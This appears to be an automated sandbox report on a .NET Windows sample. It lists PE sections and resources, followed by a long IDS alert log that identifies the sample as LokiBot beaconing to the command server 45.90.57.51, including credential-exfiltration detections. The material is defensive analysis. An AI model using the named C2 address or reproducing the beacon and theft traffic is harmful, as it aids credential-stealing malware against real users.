                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x956100x4b.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x960000x29840.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x936640x938004b55cde56a5ac233c607650303daef71False0.22714181673728814data4.029019241902378IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc0x960000x298400x29a009dd9b2e80aaafd30312fe8498c9f8dedFalse0.05544998123123123data2.5037814895104686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0xc00000xc0x200e04dff95c3411ea045ef5ff3e7f942bdFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0x962e00x10f1PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced0.6822688494350934
                  RT_ICON0x973d40x7e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.7902028698664028
                  RT_ICON0x97bbc0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.01634035253756063
                  RT_ICON0xa83e40x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.02112676056338028
                  RT_ICON0xb188c0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.027634011090573014
                  RT_ICON0xb6d140x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.02119744922059518
                  RT_ICON0xbaf3c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.04035269709543569
                  RT_ICON0xbd4e40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.05065666041275797
                  RT_ICON0xbe58c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.10081967213114754
                  RT_ICON0xbef140x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.12677304964539007
                  RT_GROUP_ICON0xbf37c0x92data0.7054794520547946
                  RT_VERSION0xbf4100x244data0.46551724137931033
                  RT_MANIFEST0xbf6540x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                  DLLImport
                  mscoree.dll_CorExeMain
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  05/16/24-00:37:53.617485TCP2025483ET TROJAN LokiBot Fake 404 Response804974445.90.57.51192.168.2.5
                  05/16/24-00:38:12.750490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.545.90.57.51
                  05/16/24-00:38:35.693093TCP2825766ETPRO TROJAN LokiBot Checkin M24976680192.168.2.545.90.57.51
                  05/16/24-00:37:01.238713TCP2025483ET TROJAN LokiBot Fake 404 Response804970945.90.57.51192.168.2.5
                  05/16/24-00:37:00.746100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970980192.168.2.545.90.57.51
                  05/16/24-00:38:08.955748TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.545.90.57.51
                  05/16/24-00:38:37.577907TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.545.90.57.51
                  05/16/24-00:36:54.264582TCP2825766ETPRO TROJAN LokiBot Checkin M24970580192.168.2.545.90.57.51
                  05/16/24-00:37:43.623424TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.545.90.57.51
                  05/16/24-00:37:00.746100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970980192.168.2.545.90.57.51
                  05/16/24-00:36:57.478820TCP2025483ET TROJAN LokiBot Fake 404 Response804970745.90.57.51192.168.2.5
                  05/16/24-00:37:07.254938TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971280192.168.2.545.90.57.51
                  05/16/24-00:37:41.744488TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.545.90.57.51
                  05/16/24-00:36:55.076784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970680192.168.2.545.90.57.51
                  05/16/24-00:38:50.123310TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.545.90.57.51
                  05/16/24-00:37:07.254938TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971280192.168.2.545.90.57.51
                  05/16/24-00:37:41.744488TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.545.90.57.51
                  05/16/24-00:37:12.990169TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.545.90.57.51
                  05/16/24-00:37:33.315004TCP2825766ETPRO TROJAN LokiBot Checkin M24973380192.168.2.545.90.57.51
                  05/16/24-00:38:01.356159TCP2825766ETPRO TROJAN LokiBot Checkin M24974880192.168.2.545.90.57.51
                  05/16/24-00:38:01.857131TCP2025483ET TROJAN LokiBot Fake 404 Response804974845.90.57.51192.168.2.5
                  05/16/24-00:38:07.071740TCP2825766ETPRO TROJAN LokiBot Checkin M24975180192.168.2.545.90.57.51
                  05/16/24-00:38:50.123310TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.545.90.57.51
                  05/16/24-00:38:43.272420TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.545.90.57.51
                  05/16/24-00:38:12.750490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.545.90.57.51
                  05/16/24-00:37:23.884685TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.545.90.57.51
                  05/16/24-00:37:57.604255TCP2025483ET TROJAN LokiBot Fake 404 Response804974645.90.57.51192.168.2.5
                  05/16/24-00:36:54.264582TCP2025381ET TROJAN LokiBot Checkin4970580192.168.2.545.90.57.51
                  05/16/24-00:37:47.955066TCP2025483ET TROJAN LokiBot Fake 404 Response804974045.90.57.51192.168.2.5
                  05/16/24-00:37:49.847441TCP2025483ET TROJAN LokiBot Fake 404 Response804974245.90.57.51192.168.2.5
                  05/16/24-00:38:03.239293TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.545.90.57.51
                  05/16/24-00:37:55.010656TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.545.90.57.51
                  05/16/24-00:37:29.556038TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.545.90.57.51
                  05/16/24-00:37:45.530428TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.545.90.57.51
                  05/16/24-00:37:11.067189TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.545.90.57.51
                  05/16/24-00:38:35.693093TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.545.90.57.51
                  05/16/24-00:38:17.603710TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.545.90.57.51
                  05/16/24-00:37:09.170149TCP2025381ET TROJAN LokiBot Checkin4971380192.168.2.545.90.57.51
                  05/16/24-00:38:01.356159TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.545.90.57.51
                  05/16/24-00:37:35.199755TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.545.90.57.51
                  05/16/24-00:38:27.085627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.545.90.57.51
                  05/16/24-00:38:28.951650TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.545.90.57.51
                  05/16/24-00:38:19.541569TCP2825766ETPRO TROJAN LokiBot Checkin M24975880192.168.2.545.90.57.51
                  05/16/24-00:37:20.628600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.545.90.57.51
                  05/16/24-00:37:47.452852TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.545.90.57.51
                  05/16/24-00:38:28.951650TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.545.90.57.51
                  05/16/24-00:37:20.628600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.545.90.57.51
                  05/16/24-00:37:47.452852TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.545.90.57.51
                  05/16/24-00:36:52.383820TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970480192.168.2.545.90.57.51
                  05/16/24-00:36:52.383820TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970480192.168.2.545.90.57.51
                  05/16/24-00:37:55.010656TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.545.90.57.51
                  05/16/24-00:37:11.067189TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.545.90.57.51
                  05/16/24-00:37:12.990169TCP2825766ETPRO TROJAN LokiBot Checkin M24972380192.168.2.545.90.57.51
                  05/16/24-00:37:25.750611TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.545.90.57.51
                  05/16/24-00:38:11.363615TCP2025483ET TROJAN LokiBot Fake 404 Response804975345.90.57.51192.168.2.5
                  05/16/24-00:37:37.637986TCP2025483ET TROJAN LokiBot Fake 404 Response804973545.90.57.51192.168.2.5
                  05/16/24-00:37:25.750611TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.545.90.57.51
                  05/16/24-00:37:29.556038TCP2825766ETPRO TROJAN LokiBot Checkin M24973180192.168.2.545.90.57.51
                  05/16/24-00:37:57.099162TCP2825766ETPRO TROJAN LokiBot Checkin M24974680192.168.2.545.90.57.51
                  05/16/24-00:37:37.130221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.545.90.57.51
                  05/16/24-00:37:16.803035TCP2825766ETPRO TROJAN LokiBot Checkin M24972580192.168.2.545.90.57.51
                  05/16/24-00:37:59.470457TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.545.90.57.51
                  05/16/24-00:38:52.514469TCP2025483ET TROJAN LokiBot Fake 404 Response804977445.90.57.51192.168.2.5
                  05/16/24-00:38:53.898131TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.545.90.57.51
                  05/16/24-00:37:07.768110TCP2025483ET TROJAN LokiBot Fake 404 Response804971245.90.57.51192.168.2.5
                  05/16/24-00:38:43.763044TCP2025483ET TROJAN LokiBot Fake 404 Response804977045.90.57.51192.168.2.5
                  05/16/24-00:38:41.388891TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.545.90.57.51
                  05/16/24-00:38:52.000180TCP2825766ETPRO TROJAN LokiBot Checkin M24977480192.168.2.545.90.57.51
                  05/16/24-00:38:19.541569TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.545.90.57.51
                  05/16/24-00:37:53.120055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.545.90.57.51
                  05/16/24-00:38:05.193094TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.545.90.57.51
                  05/16/24-00:38:18.130281TCP2025483ET TROJAN LokiBot Fake 404 Response804975745.90.57.51192.168.2.5
                  05/16/24-00:38:30.894418TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.545.90.57.51
                  05/16/24-00:37:37.130221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.545.90.57.51
                  05/16/24-00:37:30.052185TCP2025483ET TROJAN LokiBot Fake 404 Response804973145.90.57.51192.168.2.5
                  05/16/24-00:38:39.485062TCP2825766ETPRO TROJAN LokiBot Checkin M24976880192.168.2.545.90.57.51
                  05/16/24-00:37:31.431993TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.545.90.57.51
                  05/16/24-00:37:46.034175TCP2025483ET TROJAN LokiBot Fake 404 Response804973945.90.57.51192.168.2.5
                  05/16/24-00:37:51.232610TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.545.90.57.51
                  05/16/24-00:37:31.431993TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.545.90.57.51
                  05/16/24-00:36:58.862053TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970880192.168.2.545.90.57.51
                  05/16/24-00:37:49.343817TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.545.90.57.51
                  05/16/24-00:36:56.970973TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970780192.168.2.545.90.57.51
                  05/16/24-00:38:45.151548TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.545.90.57.51
                  05/16/24-00:38:07.071740TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.545.90.57.51
                  05/16/24-00:36:56.970973TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970780192.168.2.545.90.57.51
                  05/16/24-00:37:27.656502TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.545.90.57.51
                  05/16/24-00:38:33.811515TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.545.90.57.51
                  05/16/24-00:37:27.656502TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.545.90.57.51
                  05/16/24-00:38:33.811515TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.545.90.57.51
                  05/16/24-00:37:43.623424TCP2825766ETPRO TROJAN LokiBot Checkin M24973880192.168.2.545.90.57.51
                  05/16/24-00:38:45.151548TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.545.90.57.51
                  05/16/24-00:37:14.907253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.545.90.57.51
                  05/16/24-00:37:14.907253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.545.90.57.51
                  05/16/24-00:38:23.333175TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.545.90.57.51
                  05/16/24-00:37:02.627302TCP2025381ET TROJAN LokiBot Checkin4971080192.168.2.545.90.57.51
                  05/16/24-00:38:47.045718TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.545.90.57.51
                  05/16/24-00:38:25.211849TCP2825766ETPRO TROJAN LokiBot Checkin M24976180192.168.2.545.90.57.51
                  05/16/24-00:38:15.699411TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.545.90.57.51
                  05/16/24-00:38:23.333175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.545.90.57.51
                  05/16/24-00:37:39.020338TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.545.90.57.51
                  05/16/24-00:36:58.862053TCP2825766ETPRO TROJAN LokiBot Checkin M24970880192.168.2.545.90.57.51
                  05/16/24-00:37:21.133210TCP2025483ET TROJAN LokiBot Fake 404 Response804972745.90.57.51192.168.2.5
                  05/16/24-00:38:25.707920TCP2025483ET TROJAN LokiBot Fake 404 Response804976145.90.57.51192.168.2.5
                  05/16/24-00:37:17.315322TCP2025483ET TROJAN LokiBot Fake 404 Response804972545.90.57.51192.168.2.5
                  05/16/24-00:37:24.372670TCP2025483ET TROJAN LokiBot Fake 404 Response804972845.90.57.51192.168.2.5
                  05/16/24-00:38:28.951650TCP2825766ETPRO TROJAN LokiBot Checkin M24976380192.168.2.545.90.57.51
                  05/16/24-00:36:55.076784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970680192.168.2.545.90.57.51
                  05/16/24-00:37:51.232610TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.545.90.57.51
                  05/16/24-00:38:29.456072TCP2025483ET TROJAN LokiBot Fake 404 Response804976345.90.57.51192.168.2.5
                  05/16/24-00:38:31.400897TCP2025483ET TROJAN LokiBot Fake 404 Response804976445.90.57.51192.168.2.5
                  05/16/24-00:38:36.199531TCP2025483ET TROJAN LokiBot Fake 404 Response804976645.90.57.51192.168.2.5
                  05/16/24-00:37:51.232610TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.545.90.57.51
                  05/16/24-00:36:55.076784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970680192.168.2.545.90.57.51
                  05/16/24-00:37:55.010656TCP2825766ETPRO TROJAN LokiBot Checkin M24974580192.168.2.545.90.57.51
                  05/16/24-00:38:41.892700TCP2025483ET TROJAN LokiBot Fake 404 Response804976945.90.57.51192.168.2.5
                  05/16/24-00:37:11.574808TCP2025483ET TROJAN LokiBot Fake 404 Response804972245.90.57.51192.168.2.5
                  05/16/24-00:37:04.537805TCP2025381ET TROJAN LokiBot Checkin4971180192.168.2.545.90.57.51
                  05/16/24-00:38:30.894418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.545.90.57.51
                  05/16/24-00:38:50.123310TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.545.90.57.51
                  05/16/24-00:37:39.020338TCP2825766ETPRO TROJAN LokiBot Checkin M24973680192.168.2.545.90.57.51
                  05/16/24-00:37:55.010656TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.545.90.57.51
                  05/16/24-00:38:27.085627TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.545.90.57.51
                  05/16/24-00:38:17.603710TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.545.90.57.51
                  05/16/24-00:37:35.199755TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.545.90.57.51
                  05/16/24-00:38:27.085627TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.545.90.57.51
                  05/16/24-00:37:35.199755TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.545.90.57.51
                  05/16/24-00:38:45.151548TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.545.90.57.51
                  05/16/24-00:37:27.656502TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.545.90.57.51
                  05/16/24-00:37:37.130221TCP2825766ETPRO TROJAN LokiBot Checkin M24973580192.168.2.545.90.57.51
                  05/16/24-00:38:17.603710TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.545.90.57.51
                  05/16/24-00:37:39.020338TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.545.90.57.51
                  05/16/24-00:38:28.951650TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.545.90.57.51
                  05/16/24-00:37:11.067189TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.545.90.57.51
                  05/16/24-00:38:21.430034TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.545.90.57.51
                  05/16/24-00:38:30.894418TCP2825766ETPRO TROJAN LokiBot Checkin M24976480192.168.2.545.90.57.51
                  05/16/24-00:36:52.383820TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970480192.168.2.545.90.57.51
                  05/16/24-00:37:18.705946TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.545.90.57.51
                  05/16/24-00:37:25.750611TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.545.90.57.51
                  05/16/24-00:37:39.532388TCP2025483ET TROJAN LokiBot Fake 404 Response804973645.90.57.51192.168.2.5
                  05/16/24-00:38:05.694542TCP2025483ET TROJAN LokiBot Fake 404 Response804975045.90.57.51192.168.2.5
                  05/16/24-00:38:13.256185TCP2025483ET TROJAN LokiBot Fake 404 Response804975545.90.57.51192.168.2.5
                  05/16/24-00:37:37.130221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.545.90.57.51
                  05/16/24-00:37:43.623424TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.545.90.57.51
                  05/16/24-00:37:53.120055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.545.90.57.51
                  05/16/24-00:38:53.898131TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.545.90.57.51
                  05/16/24-00:38:53.898131TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.545.90.57.51
                  05/16/24-00:37:43.623424TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.545.90.57.51
                  05/16/24-00:37:59.470457TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.545.90.57.51
                  05/16/24-00:38:47.548431TCP2025483ET TROJAN LokiBot Fake 404 Response804977245.90.57.51192.168.2.5
                  05/16/24-00:38:41.388891TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.545.90.57.51
                  05/16/24-00:37:02.627302TCP2825766ETPRO TROJAN LokiBot Checkin M24971080192.168.2.545.90.57.51
                  05/16/24-00:38:08.955748TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.545.90.57.51
                  05/16/24-00:38:10.859696TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.545.90.57.51
                  05/16/24-00:38:05.193094TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.545.90.57.51
                  05/16/24-00:38:12.750490TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.545.90.57.51
                  05/16/24-00:37:53.120055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.545.90.57.51
                  05/16/24-00:38:41.388891TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.545.90.57.51
                  05/16/24-00:37:09.170149TCP2825766ETPRO TROJAN LokiBot Checkin M24971380192.168.2.545.90.57.51
                  05/16/24-00:37:59.470457TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.545.90.57.51
                  05/16/24-00:38:20.039736TCP2025483ET TROJAN LokiBot Fake 404 Response804975845.90.57.51192.168.2.5
                  05/16/24-00:38:03.239293TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.545.90.57.51
                  05/16/24-00:36:56.970973TCP2825766ETPRO TROJAN LokiBot Checkin M24970780192.168.2.545.90.57.51
                  05/16/24-00:38:10.859696TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.545.90.57.51
                  05/16/24-00:38:25.211849TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.545.90.57.51
                  05/16/24-00:37:33.823352TCP2025483ET TROJAN LokiBot Fake 404 Response804973345.90.57.51192.168.2.5
                  05/16/24-00:37:57.099162TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.545.90.57.51
                  05/16/24-00:37:31.431993TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.545.90.57.51
                  05/16/24-00:38:05.193094TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.545.90.57.51
                  05/16/24-00:36:52.383820TCP2825766ETPRO TROJAN LokiBot Checkin M24970480192.168.2.545.90.57.51
                  05/16/24-00:37:09.170149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971380192.168.2.545.90.57.51
                  05/16/24-00:36:58.862053TCP2025381ET TROJAN LokiBot Checkin4970880192.168.2.545.90.57.51
                  05/16/24-00:38:01.356159TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.545.90.57.51
                  05/16/24-00:36:56.970973TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970780192.168.2.545.90.57.51
                  05/16/24-00:37:16.803035TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.545.90.57.51
                  05/16/24-00:38:35.693093TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.545.90.57.51
                  05/16/24-00:37:18.705946TCP2825766ETPRO TROJAN LokiBot Checkin M24972680192.168.2.545.90.57.51
                  05/16/24-00:37:29.556038TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.545.90.57.51
                  05/16/24-00:37:29.556038TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.545.90.57.51
                  05/16/24-00:38:37.577907TCP2825766ETPRO TROJAN LokiBot Checkin M24976780192.168.2.545.90.57.51
                  05/16/24-00:38:47.045718TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.545.90.57.51
                  05/16/24-00:38:35.693093TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.545.90.57.51
                  05/16/24-00:38:39.485062TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.545.90.57.51
                  05/16/24-00:37:16.803035TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.545.90.57.51
                  05/16/24-00:38:47.045718TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.545.90.57.51
                  05/16/24-00:37:20.628600TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.545.90.57.51
                  05/16/24-00:37:31.431993TCP2825766ETPRO TROJAN LokiBot Checkin M24973280192.168.2.545.90.57.51
                  05/16/24-00:38:52.000180TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.545.90.57.51
                  05/16/24-00:37:33.315004TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.545.90.57.51
                  05/16/24-00:38:23.333175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.545.90.57.51
                  05/16/24-00:38:50.123310TCP2825766ETPRO TROJAN LokiBot Checkin M24977380192.168.2.545.90.57.51
                  05/16/24-00:37:59.470457TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.545.90.57.51
                  05/16/24-00:38:19.541569TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.545.90.57.51
                  05/16/24-00:38:25.211849TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.545.90.57.51
                  05/16/24-00:38:17.603710TCP2825766ETPRO TROJAN LokiBot Checkin M24975780192.168.2.545.90.57.51
                  05/16/24-00:37:31.431993TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.545.90.57.51
                  05/16/24-00:36:55.590961TCP2025483ET TROJAN LokiBot Fake 404 Response804970645.90.57.51192.168.2.5
                  05/16/24-00:37:51.232610TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.545.90.57.51
                  05/16/24-00:36:59.369699TCP2025483ET TROJAN LokiBot Fake 404 Response804970845.90.57.51192.168.2.5
                  05/16/24-00:37:57.099162TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.545.90.57.51
                  05/16/24-00:38:05.193094TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.545.90.57.51
                  05/16/24-00:38:53.898131TCP2825766ETPRO TROJAN LokiBot Checkin M24977580192.168.2.545.90.57.51
                  05/16/24-00:37:49.343817TCP2825766ETPRO TROJAN LokiBot Checkin M24974280192.168.2.545.90.57.51
                  05/16/24-00:37:57.099162TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.545.90.57.51
                  05/16/24-00:38:30.894418TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.545.90.57.51
                  05/16/24-00:38:53.898131TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.545.90.57.51
                  05/16/24-00:37:45.530428TCP2825766ETPRO TROJAN LokiBot Checkin M24973980192.168.2.545.90.57.51
                  05/16/24-00:38:03.750636TCP2025483ET TROJAN LokiBot Fake 404 Response804974945.90.57.51192.168.2.5
                  05/16/24-00:37:51.736667TCP2025483ET TROJAN LokiBot Fake 404 Response804974345.90.57.51192.168.2.5
                  05/16/24-00:37:55.510827TCP2025483ET TROJAN LokiBot Fake 404 Response804974545.90.57.51192.168.2.5
                  05/16/24-00:37:59.975323TCP2025483ET TROJAN LokiBot Fake 404 Response804974745.90.57.51192.168.2.5
                  05/16/24-00:38:30.894418TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.545.90.57.51
